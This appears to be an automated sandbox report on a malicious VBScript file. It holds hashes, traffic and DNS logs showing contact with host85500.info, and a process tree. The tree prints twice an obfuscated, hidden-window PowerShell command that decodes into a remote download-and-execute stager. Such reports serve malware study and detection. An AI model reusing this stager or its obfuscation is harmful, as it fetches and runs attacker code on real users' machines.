                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      File type:ASCII text, with very long lines (16795), with no line terminators
                                                      Entropy (8bit):4.071901946369593
                                                      TrID:
                                                        File name:analysis.vbs
                                                        File size:16'795 bytes
                                                        MD5:f88fb28db55f790656578d4fa2a18281
                                                        SHA1:6c14e47dbc336247d467a3fa9c77ec7ffa2450b1
                                                        SHA256:834024ad5c7dd595bcb62b79d6a13dc654cbe0805e8e29dba9a3590834a576ba
                                                        SHA512:a7903a20c6f5548a38a29235db211e068c0a3a210d3af2503b3d13187d107f8437abcf9be7f2ebbb55792354233bd9e8b5e99e1b5f095364865a482fd5eb8e49
                                                        SSDEEP:384:OS6QdlNQq4KP2zhsS6XzypeKxch6pUkRjf+wxib:HBQqZP+mw4
                                                        TLSH:4D72CC596E448F439C2D2E4FE0B03A2AC3EDACA5673C94D99F2D3F801D4C1527A7C999
                                                        File Content Preview:tAsSgEzAlTuwmUnGAzqqlJCVcYSW = Split("FYsZKpnyor EYsZKpnyach QSUAcZglxxrrActOEgXFj IYsZKpnyn SYsZKpnyplit(""492/YsZKpny3sK390/2sK-8+125sK308/2sK796/4sK23+176sK392/2sK112+87sK468/4sK334/2sK530-344sK-155+355sK606/3sK18+176sK564-378sK533-416sK471-308sK90+96s
                                                        Icon Hash:68d69b8f86ab9a86


                                                        • Total Packets: 20
                                                        • 15322 undefined
                                                        • 443 (HTTPS)
                                                        • 53 (DNS)
                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                         Feb 5, 2025 16:20:17.595820904 CET | 49704 | 443 | 192.168.2.5 | 149.56.240.127
                                                         Feb 5, 2025 16:20:17.595875025 CET | 443 | 49704 | 149.56.240.127 | 192.168.2.5
                                                         Feb 5, 2025 16:20:17.595969915 CET | 49704 | 443 | 192.168.2.5 | 149.56.240.127
                                                         Feb 5, 2025 16:20:17.603233099 CET | 49704 | 443 | 192.168.2.5 | 149.56.240.127
                                                         Feb 5, 2025 16:20:17.603247881 CET | 443 | 49704 | 149.56.240.127 | 192.168.2.5
                                                         Feb 5, 2025 16:20:18.202172995 CET | 443 | 49704 | 149.56.240.127 | 192.168.2.5
                                                         Feb 5, 2025 16:20:18.202313900 CET | 49704 | 443 | 192.168.2.5 | 149.56.240.127
                                                         Feb 5, 2025 16:20:18.252660036 CET | 49704 | 443 | 192.168.2.5 | 149.56.240.127
                                                         Feb 5, 2025 16:20:18.252688885 CET | 443 | 49704 | 149.56.240.127 | 192.168.2.5
                                                         Feb 5, 2025 16:20:18.252990961 CET | 443 | 49704 | 149.56.240.127 | 192.168.2.5
                                                         Feb 5, 2025 16:20:18.253063917 CET | 49704 | 443 | 192.168.2.5 | 149.56.240.127
                                                         Feb 5, 2025 16:20:18.255259991 CET | 49704 | 443 | 192.168.2.5 | 149.56.240.127
                                                         Feb 5, 2025 16:20:18.295336962 CET | 443 | 49704 | 149.56.240.127 | 192.168.2.5
                                                         Feb 5, 2025 16:20:18.361311913 CET | 443 | 49704 | 149.56.240.127 | 192.168.2.5
                                                         Feb 5, 2025 16:20:18.361419916 CET | 443 | 49704 | 149.56.240.127 | 192.168.2.5
                                                         Feb 5, 2025 16:20:18.361526012 CET | 49704 | 443 | 192.168.2.5 | 149.56.240.127
                                                         Feb 5, 2025 16:20:18.379185915 CET | 49704 | 443 | 192.168.2.5 | 149.56.240.127
                                                         Feb 5, 2025 16:20:18.379223108 CET | 443 | 49704 | 149.56.240.127 | 192.168.2.5
                                                         Feb 5, 2025 16:20:19.413455963 CET | 49705 | 15322 | 192.168.2.5 | 45.93.9.167
                                                         Feb 5, 2025 16:20:19.418328047 CET | 15322 | 49705 | 45.93.9.167 | 192.168.2.5
                                                         Feb 5, 2025 16:20:19.418411016 CET | 49705 | 15322 | 192.168.2.5 | 45.93.9.167
                                                         Feb 5, 2025 16:20:19.489339113 CET | 49705 | 15322 | 192.168.2.5 | 45.93.9.167
                                                         Feb 5, 2025 16:20:19.495076895 CET | 15322 | 49705 | 45.93.9.167 | 192.168.2.5
                                                         Feb 5, 2025 16:20:20.093193054 CET | 15322 | 49705 | 45.93.9.167 | 192.168.2.5
                                                         Feb 5, 2025 16:20:20.093215942 CET | 15322 | 49705 | 45.93.9.167 | 192.168.2.5
                                                         Feb 5, 2025 16:20:20.093295097 CET | 49705 | 15322 | 192.168.2.5 | 45.93.9.167
                                                         Feb 5, 2025 16:20:20.206953049 CET | 49705 | 15322 | 192.168.2.5 | 45.93.9.167
                                                         Feb 5, 2025 16:20:20.211811066 CET | 15322 | 49705 | 45.93.9.167 | 192.168.2.5
                                                         Feb 5, 2025 16:20:20.409662962 CET | 15322 | 49705 | 45.93.9.167 | 192.168.2.5
                                                         Feb 5, 2025 16:20:20.428282976 CET | 49705 | 15322 | 192.168.2.5 | 45.93.9.167
                                                         Feb 5, 2025 16:20:20.433203936 CET | 15322 | 49705 | 45.93.9.167 | 192.168.2.5
                                                         Feb 5, 2025 16:21:59.352375031 CET | 49705 | 15322 | 192.168.2.5 | 45.93.9.167
                                                         Feb 5, 2025 16:21:59.663949966 CET | 49705 | 15322 | 192.168.2.5 | 45.93.9.167
                                                         Feb 5, 2025 16:22:00.041023016 CET | 15322 | 49705 | 45.93.9.167 | 192.168.2.5
                                                         Feb 5, 2025 16:22:00.042548895 CET | 15322 | 49705 | 45.93.9.167 | 192.168.2.5
                                                         Feb 5, 2025 16:22:00.042865038 CET | 49705 | 15322 | 192.168.2.5 | 45.93.9.167
                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                         Feb 5, 2025 16:20:17.583128929 CET | 59286 | 53 | 192.168.2.5 | 1.1.1.1
                                                         Feb 5, 2025 16:20:17.589663982 CET | 53 | 59286 | 1.1.1.1 | 192.168.2.5
                                                         Feb 5, 2025 16:20:19.330755949 CET | 51422 | 53 | 192.168.2.5 | 1.1.1.1
                                                         Feb 5, 2025 16:20:19.366413116 CET | 53 | 51422 | 1.1.1.1 | 192.168.2.5
                                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                         Feb 5, 2025 16:20:17.583128929 CET | 192.168.2.5 | 1.1.1.1 | 0x13cc | Standard query (0) | s4.histats.com | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:19.330755949 CET | 192.168.2.5 | 1.1.1.1 | 0xe775 | Standard query (0) | host85500.info | A (IP address) | IN (0x0001) | false
                                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 149.56.240.127 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 54.39.156.32 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 149.56.240.31 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 54.39.128.162 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 54.39.128.117 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 149.56.240.130 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 142.4.219.198 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 149.56.240.131 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 158.69.254.144 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 149.56.240.132 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 149.56.240.129 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 149.56.240.128 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:17.589663982 CET | 1.1.1.1 | 192.168.2.5 | 0x13cc | No error (0) | s4.histats.com | | 149.56.240.27 | A (IP address) | IN (0x0001) | false
                                                         Feb 5, 2025 16:20:19.366413116 CET | 1.1.1.1 | 192.168.2.5 | 0xe775 | No error (0) | host85500.info | | 45.93.9.167 | A (IP address) | IN (0x0001) | false
                                                        • s4.histats.com
                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                         0 | 192.168.2.5 | 49704 | 149.56.240.127 | 443 | 5608 | C:\Windows\System32\wscript.exe
                                                         Timestamp | Bytes transferred | Direction | Data
                                                         2025-02-05 15:20:18 UTC | 385 | OUT | GET /stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1
                                                         Accept: */*
                                                         Accept-Language: en-ch
                                                         UA-CPU: AMD64
                                                         Accept-Encoding: gzip, deflate
                                                         User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                         Host: s4.histats.com
                                                         Connection: Keep-Alive
                                                         2025-02-05 15:20:18 UTC | 135 | IN | HTTP/1.1 200 OK
                                                         Date: Wed, 05 Feb 2025 15:20:18 GMT
                                                         Content-Type: text/html;charset=UTF-8
                                                         Content-Length: 376
                                                         Connection: close
                                                         2025-02-05 15:20:18 UTC | 376 | IN | Data Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
                                                         Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"



                                                        Target ID:0
                                                        Start time:10:20:09
                                                        Start date:05/02/2025
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs"
                                                        Imagebase:0x7ff6860b0000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:10:20:17
                                                        Start date:05/02/2025
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
                                                        Imagebase:0x7ff70c650000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:10:20:18
                                                        Start date:05/02/2025
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff6d64d0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:10:20:18
                                                        Start date:05/02/2025
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "
                                                        Imagebase:0x7ff70c650000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:10:20:18
                                                        Start date:05/02/2025
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
                                                        Imagebase:0xb60000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        No disassembly